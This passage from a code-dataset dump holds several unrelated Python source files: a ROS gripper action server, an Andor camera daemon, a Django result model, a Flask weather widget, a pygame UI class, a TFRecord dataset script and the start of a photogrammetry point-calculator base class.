actionlib.SimpleActionServer.__init__(self, self._action_name, CommandRobotiqGripperAction, execute_cb=self.execute_callBack, auto_start=False)\n rospy.Publisher.__init__(self, 'joint_states', JointState, queue_size=10)\n\n whatchdog_connection = rospy.Timer(rospy.Duration(15.0), self.__connection_timeout, oneshot=True)\n while not rospy.is_shutdown() and not self.initialize():\n #rospy.sleep(1)\n rospy.logwarn_throttle(5, self._action_name + \": Waiting for gripper to be ready...\")\n\n time.sleep(0.7)\n\n whatchdog_connection.shutdown()\n if self.is_ready():\n self.start()\n rospy.loginfo(\"Action server is Active\")\n else:\n 
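# Added note: reaching this branch means the Modbus link came up but the gripper\n            # never reported ready, so the action server is deliberately not started.\n            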
rospy.loginfo(\"Gripper Is Connected but Can't Activate \")\n \n self.__feedback = self.__getStatusFeedback()\n \n\n def __connection_timeout(self, event):\n rospy.logfatal(\"Gripper on port %s seems not to respond\" % (self.com_port))\n rospy.signal_shutdown(\"Gripper on port %s seems not to respond\" % (self.com_port))\n self._processing_goal = False\n\n def __movement_timeout(self, event):\n rospy.logerr(\"%s: Achieving goal is taking too long, dropping current goal\")\n \n def __getStatusFeedback(self):\n status = CommandRobotiqGripperFeedback()\n status.header.stamp = rospy.get_rostime()\n status.header.seq = 0\n status.is_ready = super().is_ready()\n status.is_reset = super().is_reset()\n status.is_moving = super().is_moving()\n status.obj_detected = super().object_detected()\n status.fault_status = super().get_fault_status()\n status.position = super().get_pos()\n status.requested_position = super().get_req_pos()\n status.current = super().get_current()\n print(status)\n return status\n \n def __PosError(self):\n return abs(self.__feedback.requested_position - self.__feedback.position)\n\n def __abortingActionServer(self, abort_error):\n rospy.logerr(\"%s: Dropping current goal -> \" + abort_error )\n self.set_aborted(self.__feedback , (self._action_name))\n\n def execute_callBack(self, goal):\n if not self.is_gripper_connected:\n self.__abortingActionServer(\"Connection Lost\")\n \n \n self.__feedback = self.__getStatusFeedback()\n rospy.loginfo( (\": New goal received Pos:%.3f Speed: %.3f Force: %.3f Force-Stop: %r\") % (goal.position, goal.speed, goal.force, goal.stop) )\n\n success = False\n rate = rospy.Rate(1)\n\n \n if not goal.stop:\n is_modbus_msg_sent = self.goTo(goal.position, goal.speed, goal.force)\n self._processing_goal = True \n else:\n rospy.logwarn_throttle(5, self._action_name + \": stop command is active\")\n\n if not is_modbus_msg_sent:\n self.__abortingActionServer(\"Unable to Send Modbus MSG\")\n \n watchdog_move = rospy.Timer(rospy.Duration(5.0), self.__movement_timeout, oneshot=True)\n\n while not rospy.is_shutdown() and self._processing_goal: \n \n if not self.is_gripper_connected:\n self.__abortingActionServer(\"Connection Lost\")\n \n self.__feedback = self.__getStatusFeedback()\n rospy.logdebug(\"Error = %.5f Requested position = %.3f Current position = %.3f\" % (abs(self.__feedback.requested_position - self.__feedback.position), self.__feedback.requested_position, self.__feedback.position))\n \n if self.is_preempt_requested():\n rospy.loginfo('%s: Preempted' % self._action_name)\n self.set_preempted()\n break\n\n if self.__feedback.fault_status != 0:\n self.__abortingActionServer(\"Fault status (gFLT) is: %d\" % self.__feedback.fault_status)\n self._processing_goal = False\n break\n if( self.__PosError() < GOAL_DETECTION_THRESHOLD or self.__feedback.obj_detected):\n self._processing_goal = False\n success = True\n print(success)\n break\n self.publish_feedback(self.__feedback)\n \n rate.sleep()\n \n\n self.__result = self.__feedback\n watchdog_move.shutdown()\n if success:\n rospy.logdebug(self._action_name + \": Goal reached or object detected Pos: %.3f PosRequested: %.3f ObjectDetected: %r\" % (goal.position, self.__feedback.requested_position, self.__feedback.obj_detected) )\n self.set_succeeded(self.__result)\n \n def setGripperJointNames(self, joint_name1, joint_name2):\n self._joint_name = [joint_name1, joint_name2]\n \n def publish_joint_states(self):\n rate = rospy.Rate(50)\n while not rospy.is_shutdown():\n if self.is_gripper_connected:\n # 
__feedback = self.__getStatusFeedback()\n js = JointState()\n js.header.frame_id = ''\n js.header.stamp = rospy.Time.now()\n # js.header.seq = self._seq\n js.name = self._joint_name\n js.position = [self.__feedback.position/2-self._xacro_frame_error, self.__feedback.position-self._xacro_frame_error]\n super().publish(js)\n rate.sleep()\n def set_xacro_frame_error(self, error):\n self._xacro_frame_error = error\n \n\n \n\nif __name__ == \"__main__\":\n\n rospy.init_node('robotiq_2f85_action_server')\n \n print('AS get Param')\n usb_port = rospy.get_param('~usb_port','/dev/ttyUSB0')\n name_finger1 = rospy.get_param('~name_finger1','ur5_bl_to_leftFinger')\n name_finger2 = rospy.get_param('~name_finger2','ur5_leftFinger_to_rightFinger')\n \n server_gripper = RobotiqGripperActionServer(action_server_name= \"robotiq_hand_e\", gripper_type = RobotiqGripperType.Hand_E, usbComPort = usb_port)\n server_gripper.setGripperJointNames(name_finger1, name_finger2)\n server_gripper.set_xacro_frame_error(0.008)\n thread_joint = Thread(target=server_gripper.publish_joint_states)\n thread_joint.start()\n \n # server_ur5e = RobotiqGripperActionServer(action_server_name= gripper_ur5e, gripper_type = RobotiqGripperType.Hand_E, usbComPort = \"/dev/ttyUSB0\")\n # server_ur5e.setGripperJointNames(\"ur5e_bl_to_leftFinger\", \"ur5e_leftFinger_to_rightFinger\")\n # server_ur5 = RobotiqGripperActionServer(action_server_name= gripper_ur5, gripper_type = RobotiqGripperType.Hand_E, usbComPort = \"/dev/ttyUSB1\")\n # server_ur5.setGripperJointNames(\"ur5_bl_to_leftFinger\", \"ur5_leftFinger_to_rightFinger\")\n # server_ur5.set_xacro_frame_error(0.008)\n # server_ur5e.set_xacro_frame_error(0.008)\n # thread_joint_states_ur5e= Thread(target=server_ur5e.publish_joint_states)\n # thread_joint_states_ur5 = Thread(target=server_ur5.publish_joint_states)\n # thread_joint_states_ur5.start()\n # thread_joint_states_ur5e.start()\n \n \n rospy.spin()\n ","repo_name":"GovoUnibo/robotiq_control","sub_path":"src/robotiq_control/GripperActSrvMdbsRs485.py","file_name":"GripperActSrvMdbsRs485.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36839196244","text":"__all__ = [\"AndorSDK3\"]\n\nimport asyncio\nimport numpy as np\nimport os\n\nfrom yaqd_core import IsDaemon, IsSensor, HasMeasureTrigger, HasMapping\nfrom typing import Any, List, Union\nfrom . import atcore\nfrom . 
import features\n\nATCore = atcore.ATCore\nATCoreException = atcore.ATCoreException\n\n\nclass AndorSDK3(HasMapping, HasMeasureTrigger, IsSensor, IsDaemon):\n state_features: List[str] = []\n\n def __init__(self, name, config, config_filepath):\n super().__init__(name, config, config_filepath)\n self._channel_names = [\"image\"]\n self._channel_mappings = {\"image\": [\"x_index\", \"y_index\"]}\n self._mapping_units = {\"x_index\": \"None\", \"y_index\": \"None\"}\n self._channel_units = {\"image\": \"counts\"}\n\n initial_cwd = os.getcwd()\n try:\n os.chdir(os.path.dirname(__file__))\n self.sdk = ATCore() # Initialise SDK3\n finally:\n os.chdir(initial_cwd)\n # find devices\n device_count = self.sdk.get_int(self.sdk.AT_HNDL_SYSTEM, \"DeviceCount\")\n if device_count == 0:\n raise ConnectionError(\"No devices found.\")\n # select device\n for i in range(device_count):\n temp = self.sdk.open(i)\n serial = self.sdk.get_string(temp, \"SerialNumber\")\n if serial == self._config[\"serial\"]:\n self.hndl = temp\n self.logger.info(f\" Serial No : {serial}\")\n break\n self.sdk.close(temp)\n else:\n raise ConnectionError(\n r\"device with serial number {0} not found\".format(self._config[\"serial\"])\n )\n\n self.features = {}\n model = self._config[\"model\"][0].lower()\n assert model in \"ansz\"\n for k, v in features.specs.items():\n if model in v.availability:\n try:\n self.features[k] = features.obj_from_spec(self.sdk, self.hndl, v)\n except NotImplementedError:\n self.logger.warn(\n f\"feature {v.sdk_name} is supposed to be implemented, but is not!\"\n )\n else:\n self.logger.debug(\n f\"{k}, {self.features[k].is_implemented}, {self.features[k].is_readonly}\"\n )\n\n self.sensor_info = {}\n for k in [\"sensor_width\", \"sensor_height\", \"pixel_height\", \"pixel_width\"]:\n try:\n self.sensor_info[k] = self.features[k].get()\n except ATCoreException as err:\n self.logger.error(err)\n self.logger.debug(self.sensor_info)\n\n for key in self.state_features:\n fi = self.features[key]\n dest = self._state[key]\n if dest in [\"\", -1]: # unassigned, poll for current value\n self._state[key] = fi.get()\n else:\n try: # some things we cannot write to, even though we should\n fi.set(dest)\n except Exception as e:\n self.logger.error(e)\n # generate avro properties\n self.__setattr__(f\"set_{key}\", self.gen_setter(key))\n self.__setattr__(f\"get_{key}\", self.gen_getter(key))\n if self.features[key].type in [\"int\", \"float\"]:\n self.__setattr__(f\"get_{key}_limits\", self.gen_limits_getter(key))\n elif self.features[key].type in [\"enumerated\"]:\n self.__setattr__(f\"get_{key}_options\", self.gen_options_getter(key))\n\n async def _measure(self):\n image_size_bytes = self.features[\"image_size_bytes\"].get()\n buf = np.empty((image_size_bytes,), dtype=\"B\")\n timeout = max(self.features[\"exposure_time\"].get() * 2e3, 100)\n # 2e3: seconds to ms (1e3), plus wait twice as long as acquisition before timeout\n try:\n self.sdk.queue_buffer(self.hndl, buf.ctypes.data, image_size_bytes)\n # acquire frame\n self.features[\"acquisition_start\"]()\n self.logger.debug(\"Waiting on buffer\")\n (returnedBuf, returnedSize) = await self._loop.run_in_executor(\n None, self.sdk.wait_buffer, self.hndl, timeout\n )\n self.logger.debug(\"Done waiting on buffer\")\n self.features[\"acquisition_stop\"]()\n except ATCoreException as err:\n self.logger.error(f\"SDK3 Error {err}\")\n\n stride = self.features[\"aoi_stride\"].get()\n pixels = np.lib.stride_tricks.as_strided(\n np.frombuffer(buf, dtype=np.uint16),\n 
shape=self._channel_shapes[\"image\"],\n strides=(stride, 2), # binning works?\n )\n self.logger.debug(f\"{pixels.size}, {np.prod(self._channel_shapes['image'])}\")\n pixels = np.ascontiguousarray(pixels)\n self.sdk.flush(self.hndl)\n\n return {\"image\": pixels}\n\n def get_sensor_info(self):\n return self.sensor_info\n\n def get_feature_names(self) -> List[str]:\n return [f\"{k} -> {v.sdk_name}\" for k, v in self.features.items()]\n\n def get_feature_type(self, k: str):\n return self.features[k].type\n\n def get_feature_value(self, k: str) -> Union[int, bool, float, str]:\n feature = self.features[k]\n return feature.get()\n\n def get_feature_options(self, k: str) -> List[str]: # -> List[Union[str, float, int]]:\n feature = self.features[k]\n if feature.type == \"enumerated\": # isinstance(feature, features.SDKEnum):\n return feature.options()\n else:\n raise ValueError(f\"feature {feature} is of type {feature.type}. No options.\")\n\n def get_feature_limits(self, k: str) -> List[Union[float, int]]:\n feature = self.features[k]\n if feature.type in [\"int\", \"float\"]:\n return [feature.min(), feature.max()]\n raise ValueError(f\"feature {feature} is of type {feature.type}. No limits.\")\n\n def close(self):\n self.sdk.close(self.hndl)\n\n def _set_feature_by_key(self, key, val):\n self._loop.create_task(self._aset_feature_by_key(key, val))\n\n async def _aset_feature_by_key(self, key, val):\n if self._busy:\n await asyncio.wait_for(self._not_busy_sig.wait())\n self.features[key].set(val)\n self._state[key] = self.features[key].get()\n\n def gen_setter(self, key):\n def setter(val: Any):\n self._set_feature_by_key(key, val)\n\n return setter\n\n def gen_getter(self, key):\n def getter() -> Any:\n return self._state[key]\n\n return getter\n\n def gen_limits_getter(self, key):\n def getter() -> List[float]:\n return [self.features[key].min(), self.features[key].max()]\n\n return getter\n\n def gen_options_getter(self, key):\n def getter() -> str:\n return self.features[key].options()\n\n return getter\n","repo_name":"yaq-project/yaqd-andor","sub_path":"yaqd_andor/_andor_sdk3.py","file_name":"_andor_sdk3.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71282120809","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom vsdk.service_development.models import CallSession, get_object_or_404\n\nimport logging\nlogger = logging.getLogger(\"mada\")\n\n\nclass ResultItem(models.Model):\n \"\"\"\n A result is a message element, associated to a self-check session\n \"\"\"\n session = models.ForeignKey(CallSession, on_delete=models.PROTECT, related_name=\"session_result\",\n verbose_name=_('Call session'), null=True, blank=True)\n symptom_no = models.PositiveIntegerField(null=True, blank=True,\n verbose_name=_('Number of confirmed symptoms'),\n help_text=_(\"The number of reported symptoms.\"))\n risk_no = models.PositiveIntegerField(null=True, blank=True,\n verbose_name=_('Number of confirmed risk factors'),\n help_text=_(\"The number of reported risks.\"))\n is_exposed = models.BooleanField(\n verbose_name=_('Exposed'),\n help_text=_(\"Whether the person has been exposed to the virus.\"),\n null=True, blank=True)\n infected_probability = models.FloatField(null=True, blank=True,\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n verbose_name=_('Infection estimated 
probability'),\n help_text=_(\n 'The probability that the person has been infected, based on the configured parameters.'))\n is_infected_prediction = models.BooleanField(\n verbose_name=_('Self-check result'),\n help_text=_('Whether the person is believed to be infected after the self-check.'),\n null=True, blank=True)\n testing_recommended = models.BooleanField(\n verbose_name=_('Is testing recommended'),\n help_text=_('Whether testing is recommended.'),\n null=True, blank=True)\n testing_confirmation = models.BooleanField(\n verbose_name=_('Predicted result was confirmed by testing'),\n help_text=_('Whether the person tested positive for COVID-19.'),\n null=True, blank=True)\n\n class Meta:\n verbose_name_plural = _('Self-Check Results')\n\n def __str__(self):\n return _(\n 'Result: %s, exposure: %s, symptoms: %s, risks: %s, infected prediction: %s, confirmed: %s, testing result: %s') % (\n self.session,\n self.is_exposed,\n self.symptom_no,\n self.risk_no,\n self.is_infected_prediction,\n self.testing_confirmation is not None,\n self.testing_confirmation,\n\n )\n\n\ndef update_is_exposed_for_session(session=None, is_exposed=None):\n result_item = None\n try:\n result_item = get_object_or_404(ResultItem, session=session)\n logger.debug(\"Retrieved result item - {}\".format(result_item))\n except Exception as e:\n print(\"Could not retrieve result for session - {}\".format(e))\n result_item = ResultItem.objects.create() # create result item for session\n result_item.session = session\n logger.debug(\"Created new result item - {}\".format(result_item))\n finally:\n if not result_item.is_exposed: # can be updated only if False\n result_item.is_exposed = is_exposed\n logger.debug(\"Is exposed is - {}\".format(is_exposed))\n result_item.save()\n return result_item\n\n\ndef update_or_create_result_item_for_session(session=None, symptom_no=None, risk_no=None, is_exposed=None,\n infected_probability=None, is_infected_prediction=None,\n testing_recommended=None):\n result_item = None\n try:\n result_item = get_object_or_404(ResultItem, session=session)\n logger.debug(\"Retrieved result item - {}\".format(result_item))\n except Exception as e:\n print(\"Could not retrieve result for session - {}\".format(e))\n result_item = ResultItem.objects.create() # create result item for session\n result_item.session = session\n logger.debug(\"Created new result item - {}\".format(result_item))\n finally:\n # set result fields\n if symptom_no:\n result_item.symptom_no = symptom_no\n if risk_no:\n result_item.risk_no = risk_no\n if is_exposed is not None:\n result_item.is_exposed = is_exposed\n if infected_probability is not None:\n logger.debug(\"Set infection probability - {}\".format(infected_probability))\n result_item.infected_probability = infected_probability\n if is_infected_prediction is not None:\n logger.debug(\"Set infection prediction - {}\".format(is_infected_prediction))\n result_item.is_infected_prediction = is_infected_prediction\n if testing_recommended is not None:\n logger.debug(\"Set testing recommendation - {}\".format(testing_recommended))\n result_item.testing_recommended = testing_recommended\n\n logger.debug(\"Saving result item - {}\".format(result_item))\n result_item.save()\n return result_item\n\n","repo_name":"MadalinaDinga/KasaDaka-HealthVSDK-civic","sub_path":"vsdk/service_development/models/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
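A hedged usage sketch for the helpers defined in the record above (the `session` object and every field value below are hypothetical; only the keyword names are taken from `update_or_create_result_item_for_session` as defined there):

    # Illustration only: `session` is assumed to be an existing CallSession.
    result = update_or_create_result_item_for_session(
        session=session,
        symptom_no=3,
        risk_no=1,
        is_exposed=True,
        infected_probability=62.5,
        is_infected_prediction=True,
        testing_recommended=True,
    )
    # A second call with the same session updates the stored ResultItem
    # rather than creating a duplicate.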
+{"seq_id":"23029532547","text":"from flask import Flask, make_response, request\n\n\napp = Flask(__name__, static_url_path='/examples', static_folder='build')\n\n\nWEATHER_DATA = {\n \"1\": {\n 'location': 'San Francisco',\n 'image': 'http://localhost:5000/examples/partly_cloudy.png',\n 'temp': 78,\n 'desc': 'Partly Cloudy'\n }\n}\n\n\n@app.route('/')\ndef home():\n return 'hello world'\n\n\n@app.route('/widget.js')\ndef weather_widget():\n zip = request.args.get('zip')\n data = WEATHER_DATA[zip]\n\n out = '''\n const container = document.getElementById('container')\n container.innerHTML = (\n '<div>' +\n ' <p>%s<p>' +\n ' <img src=\"%s\" />' +\n ' <p><strong>%s °F</strong> — %s</p>' +\n '</div>'\n )\n ''' % (data['location'], data['image'], data['temp'], data['desc'])\n\n response = make_response(out)\n response.headers['Content-Type'] = 'application/javascript'\n\n return response\n","repo_name":"Karimit/widget-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"340232478","text":"from typing import Optional, Tuple, Dict\nfrom abc import ABC, abstractmethod\n\nimport warnings\nimport pygame\n\n\"\"\" Default kwargs for all Ui elements (although some don't use them) \"\"\"\ndefault_kwargs = \\\n {\n 'has_border': True,\n 'border_width': 2,\n 'border_color': (0, 0, 0),\n 'font': 'Ariel',\n 'font_size': 30,\n 'text_color': (0, 0, 0)\n }\n\n\nclass UI(ABC):\n \"\"\" Base class for a UI element \"\"\"\n\n def __init__(self,\n rect: Tuple[int, int, int, int],\n params: Optional[Dict] = None) -> None:\n\n # Variables for UI elements\n self.x, self.y, self.width, self.height = rect\n self.rect = pygame.Rect(rect)\n\n # add default values for key worded arguments\n self.__dict__.update(default_kwargs)\n\n # update values for given key worded arguments\n for key, val in params.items():\n if key in default_kwargs:\n self.__dict__.update({key: val})\n else:\n warnings.warn(f'{key} not recognized')\n\n @abstractmethod\n def handle_event(self, event: pygame.event) -> None:\n \"\"\"\n Handles events of the UI element\n Should be called for every event in the game inside the game main loop\n :param event: pygame even\n :return: None\n \"\"\"\n pass\n\n def draw(self, screen: pygame.Surface, color: Tuple[int, int, int]) -> None:\n \"\"\"\n Draws the basics of the UI element-\n background and the borders\n :param screen: pygame display\n :param color r, g, b of color to fill borders with\n :return: None\n \"\"\"\n\n # Draw Bigger rect to create the illusion of a border\n if self.has_border:\n pygame.draw.rect(screen, self.border_color, (self.x - self.border_width,\n self.y - self.border_width,\n self.width + self.border_width * 2,\n self.height + self.border_width * 2))\n\n pygame.draw.rect(screen, color, self.rect)\n\n\n","repo_name":"roey-lifshitz/cnn-scribble","sub_path":"UI/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12440487358","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 2 15:35:43 2018\r\n\r\n@author: n.muthuraj\r\n\"\"\"\r\n\r\nfrom random import shuffle\r\nimport sys\r\nimport cv2\r\nimport tensorflow as tf\r\nimport clean_data \r\n\r\n\r\ndef _int64_feature(value):\r\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\r\ndef _bytes_feature(value):\r\n return 
tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\r\n\r\ndef load_image(addr):\r\n # read an image and resize to (224, 224)\r\n # cv2 load images as BGR, convert it to RGB\r\n img = cv2.imread(addr)\r\n if img is None:\r\n return None\r\n img = cv2.resize(img, (224, 224), interpolation=cv2.INTER_CUBIC)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n cv2.imwrite(addr,img)\r\n return img\r\n \r\ndef createDataRecord(out_filename, list_images, labels):\r\n # open the TFRecords file\r\n writer = tf.python_io.TFRecordWriter(out_filename)\r\n for i in range(len(list_images)):\r\n # print how many images are saved every 1000 images\r\n if not i % 1000:\r\n print('Train data: {}/{}'.format(i, len(list_images)))\r\n sys.stdout.flush()\r\n # Load the image\r\n img = load_image(list_images[i])\r\n\r\n label = labels[i]\r\n\r\n if img is None:\r\n continue\r\n\r\n # Create a feature\r\n feature = {\r\n 'image_raw': _bytes_feature(img.tostring()),\r\n 'label': _int64_feature(label)\r\n }\r\n # Create an example protocol buffer\r\n example = tf.train.Example(features=tf.train.Features(feature=feature))\r\n \r\n # Serialize to string and write on the file\r\n writer.write(example.SerializeToString())\r\n \r\n writer.close()\r\n sys.stdout.flush()\r\n\r\n\r\nlist_images=clean_data.list_images\r\nlabels=clean_data.labels\r\n\r\nc = list(zip(list_images, labels))\r\nshuffle(c)\r\nlist_images, labels=zip(*c) \r\n \r\n# Divide the data into 60% train, 20% validation, and 20% test\r\ntrain_list_images = list_images[0:int(0.6*len(list_images))]\r\ntrain_labels = labels[0:int(0.6*len(labels))]\r\nval_list_images = list_images[int(0.6*len(list_images)):int(0.8*len(list_images))]\r\nval_labels = labels[int(0.6*len(list_images)):int(0.8*len(list_images))]\r\ntest_list_images = list_images[int(0.8*len(list_images)):]\r\ntest_labels = labels[int(0.8*len(labels)):]\r\n\r\n\r\n\r\n# Creation of TF records\r\n#createDataRecord('train.tfrecords', train_list_images, train_labels)\r\n#createDataRecord('val.tfrecords', val_list_images, val_labels)\r\n#createDataRecord('test.tfrecords', test_list_images, test_labels)\r\n\r\n\r\n# clean up un necessary variables\r\n\r\ndel (c,list_images,labels)","repo_name":"nitheeshmuthuraj/age-gender-determination-of-a-person-with-image-data-Convloution-netural-network-","sub_path":"create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26097690053","text":"from __future__ import division\n\nimport abc\nfrom numpy import ndarray\nfrom pyproj import Proj\nfrom pyproj import transform as proj_transform\nimport numpy as np\nimport numbers\nfrom resippy.photogrammetry.dem.abstract_dem import AbstractDem\nimport resippy.utils.image_utils.image_utils as image_utils\nfrom six import add_metaclass\n\n\n@add_metaclass(abc.ABCMeta)\nclass AbstractEarthOverheadPointCalc:\n \"\"\"\n This is the Abstract Earth Overhead Point Calculator class. Concrete implementations for specific types of\n Overhead Earth Point Calculators should be created for the specific Earth Overhead Image Objects they support.\n \"\"\"\n\n def __init__(self):\n # TODO add parameters that specify the point calculator's altitude reference datum.\n \"\"\"\n This is used to initialize the point calculator. 
The following class variables store information about\n        the point calculator:\n        _lon_lat_center_approximate: The approximate (longitude, latitude) center of the image\n        _projection: The native projection of the point calculator\n        _bands_coregistered: If the image this point calculator supports has multiple bands this variable\n        specifies whether or not they are coregistered.\n        \"\"\"\n        self._lon_lat_center_approximate = None\n        self._projection = None\n        self._bands_coregistered = True\n\n    @abc.abstractmethod\n    def _lon_lat_alt_to_pixel_x_y_native(self,\n                                         lons,  # type: ndarray\n                                         lats,  # type: ndarray\n                                         alts,  # type: ndarray\n                                         band=None  # type: int\n                                         ):  # type: (...) -> (ndarray, ndarray)\n        \"\"\"\n        This is a protected abstract method that can be implemented for concrete implementations of this class.\n        A point calculator should implement either this method or _pixel_x_y_alt_to_lon_lat_native. If this method\n        is not implemented and _pixel_x_y_alt_to_lon_lat_native is, then this method can be solved for with iterative\n        methods.\n        :param lons: longitudes in the point calculator's native projection, provided as a numpy ndarray\n        :param lats: latitudes in the point calculator's native projection, provided as a numpy ndarray\n        :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n        :param band: specific image band provided as an int. If this variable is None it assumes all bands are\n        coregistered\n        :return: (pixel_x, pixel_y) provided as a tuple of numpy ndarrays\n        \"\"\"\n        pass\n\n    @abc.abstractmethod\n    def _pixel_x_y_alt_to_lon_lat_native(self,\n                                         pixel_xs,  # type: ndarray\n                                         pixel_ys,  # type: ndarray\n                                         alts=None,  # type: ndarray\n                                         band=None  # type: int\n                                         ):  # type: (...) -> (ndarray, ndarray)\n        \"\"\"\n        This is a protected abstract method that can be implemented for concrete implementations of this class.\n        A point calculator should implement either this method or _lon_lat_alt_to_pixel_x_y_native. If this method\n        is not implemented and _lon_lat_alt_to_pixel_x_y_native is, then this method can be solved for with iterative\n        methods. This functionality is provided automatically within the pixel_x_y_alt_to_lon_lat method of this\n        class.\n        :param pixel_xs: x pixels, provided as a numpy ndarray\n        :param pixel_ys: y pixels, provided as a numpy ndarray\n        :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n        :param band: specific image band provided as an int. If this variable is None it assumes all bands are coregistered\n        :return: (longitudes, latitudes) in the point calculator's native projection, provided as a tuple of numpy\n        ndarrays\n        \"\"\"\n        pass\n\n    def lon_lat_alt_to_pixel_x_y(self,\n                                 lons,  # type: ndarray\n                                 lats,  # type: ndarray\n                                 alts,  # type: ndarray\n                                 world_proj=None,  # type: Proj\n                                 band=None  # type: int\n                                 ):  # type: (...) -> (ndarray, ndarray)\n        \"\"\"\n        This method calculates pixel x / y values given longitude, latitude and altitude information. It uses\n        _lon_lat_alt_to_pixel_x_y_native under the hood, and provides some convenience to the user. These\n        conveniences include automatic handling of different projections, and also allows the user to input\n        longitudes, latitudes and altitudes as either 1d or 2d numpy arrays. The results will be output in the\n        same dimensions as the inputs.
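\n\n        A doctest-style sketch added for illustration (``pc`` stands in for any\n        concrete point calculator; only the shapes matter here):\n\n            >>> px, py = pc.lon_lat_alt_to_pixel_x_y(np.zeros((4, 3)), np.zeros((4, 3)), np.zeros((4, 3)))\n            >>> px.shape\n            (4, 3)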
\n        :param lons: longitudes provided as a numpy ndarray, can be either 1d or 2d numpy array, or a single float value\n        :param lats: latitudes provided as a numpy ndarray, can be either 1d or 2d numpy array, or a single float value\n        :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n        :param world_proj: projection of the input longitudes and latitudes\n        :param band: specific image band provided as an int. If this variable is None it assumes all bands are coregistered\n        :return: (pixel x, pixel y) as a tuple of numpy ndarrays (1d or 2d), or a tuple of float. The output will match the input\n        \"\"\"\n        # check for some errors up front\n        if alts is None:\n            alts = 0\n        # standardize inputs, make everything 1 dimensional ndarrays\n        lons_is_number = isinstance(lons, numbers.Number)\n        lats_is_number = isinstance(lats, numbers.Number)\n        alts_is_number = isinstance(alts, numbers.Number)\n        if lons_is_number or lats_is_number:\n            lons = np.array([lons])\n            lats = np.array([lats])\n        if alts_is_number:\n            alts = np.zeros(lons.shape) + alts\n        world_xyz_is_2d = False\n        # auto-detect if world x-y-z arrays are 2d and flatten world_x and world_y arrays if they are 2d.\n        # This is done to make all the vector math less complicated and keep it fast without needing to use loops\n        if np.ndim(lons) == 2:\n            world_xyz_is_2d = True\n            nx = np.shape(lons)[1]\n            ny = np.shape(lons)[0]\n            lons = np.reshape(lons, nx * ny)\n            lats = np.reshape(lats, nx * ny)\n            alts = np.reshape(alts, nx * ny)\n\n        # now actually do the calculations with everything in a standard form\n        if world_proj is None:\n            world_proj = self.get_projection()\n        if world_proj.srs != self.get_projection().srs:\n            lons, lats, alts = proj_transform(world_proj, self.get_projection(), lons, lats, alts)\n        pixel_coords = self._lon_lat_alt_to_pixel_x_y_native(lons, lats, alts, band)\n\n        if lons_is_number or lats_is_number:\n            pixel_coords = pixel_coords[0][0], pixel_coords[1][0]\n\n        # now transform everything back if it wasn't in a standard form coming in\n        # unflatten world_xyz arrays if the original inputs were 2d\n        if world_xyz_is_2d:\n            pixel_coords_x_2d = np.reshape(pixel_coords[0], (ny, nx))\n            pixel_coords_y_2d = np.reshape(pixel_coords[1], (ny, nx))\n            return pixel_coords_x_2d, pixel_coords_y_2d\n\n        return pixel_coords\n\n    def pixel_x_y_alt_to_lon_lat(self,\n                                 pixel_xs,  # type: ndarray\n                                 pixel_ys,  # type: ndarray\n                                 alts,  # type: ndarray\n                                 world_proj=None,  # type: Proj\n                                 band=None,  # type: int\n                                 pixel_error_threshold=0.01,  # type: float\n                                 max_iter=1000,  # type: int\n                                 ):  # type: (...) -> (ndarray, ndarray)\n        \"\"\"\n        This will calculate a pixel's lon / lat location on earth. 
It uses _pixel_x_y_alt_to_lon_lat_native under the\n        hood, and if that method is not implemented it will solve iteratively using _pixel_x_y_alt_to_lon_lat_native_solver.\n        It provides conveniences to users such as automatic handling of world projections, and allows the user to input\n        either numbers, or 1d or 2d numpy arrays as inputs for pixel values and altitudes.\n        :param pixel_xs: x pixels, as either a float or 1d or 2d numpy array\n        :param pixel_ys: y pixels, as either a float or 1d or 2d numpy array\n        :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n        :param world_proj: projection of the input longitudes and latitudes\n        :param band: band number of the image\n        :param pixel_error_threshold: pixel threshold to use if the iterative solver is used. Defaults to 0.01 pixels\n        :param max_iter: maximum iteration. This is used if the iterative solver does not converge to avoid entering\n        an infinite loop. Defaults to 1000 iterations.\n        :return: (lon, lat) as a tuple of float, or tuple of 1d or 2d numpy ndarray, to match the input of pixel_xs, and pixel_ys\n        \"\"\"\n        if world_proj is None:\n            world_proj = self.get_projection()\n        if self._pixel_x_y_alt_to_lon_lat_native(pixel_xs, pixel_ys, alts, band) is not None:\n            native_lons, native_lats = self._pixel_x_y_alt_to_lon_lat_native(pixel_xs, pixel_ys, alts, band=band)\n        else:\n            native_lons, native_lats = \\\n                self._pixel_x_y_alt_to_lon_lat_native_solver(pixel_xs,\n                                                             pixel_ys,\n                                                             alts,\n                                                             band=band,\n                                                             max_pixel_error=pixel_error_threshold,\n                                                             max_iter=max_iter)\n        if world_proj.srs != self.get_projection().srs:\n            lons, lats = proj_transform(self.get_projection(), world_proj, native_lons, native_lats)\n            return lons, lats\n        else:\n            return native_lons, native_lats\n\n    def _pixel_x_y_alt_to_lon_lat_native_solver(self,\n                                                pixel_xs,  # type: ndarray\n                                                pixel_ys,  # 